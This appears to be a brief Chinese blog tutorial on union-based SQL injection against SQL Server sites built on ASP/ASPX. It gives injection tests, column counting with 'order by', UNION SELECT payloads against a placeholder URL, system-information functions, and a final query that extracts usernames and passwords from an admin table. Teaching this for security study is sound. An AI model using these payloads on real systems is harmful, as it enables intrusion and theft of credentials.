WEB安全之SQL注入:sqlserver 联合 注入

摘要

1、简介


sqlserver经常与asp或者aspx一起使用,操作系统多数是win2012win2018

数据库版本 sql2008 sql2012

http://www.demo1.com/index.aspx?id=1


2、注释符号


--空格 单行注释
/*   */ 多行注释


3、判断是否注入


' 单引号是否报错

and 1=2

and 1=1

页面是否相同


4、判断列数



order by

    order by 3



5、联合查询


联合查询 需要每个列的类型要一直 或者可以使用null 直到页面出错。

http://www.demo1.com/index.aspx?id=-1union select 1,'2','3'
http://www.demo1.com/index.aspx?id=-1union select null,null,null



6、查询系统信息


db_name() 数据库名
@@version 版本信息
User_Name() 当前用户
host_name()  计算机名称

1559816850108026.jpg

7、查询数据

http://www.demo1.com/index.aspx?id=-1  union select null,username,password from admin



3.jpg

目前评论:0 条

发表评论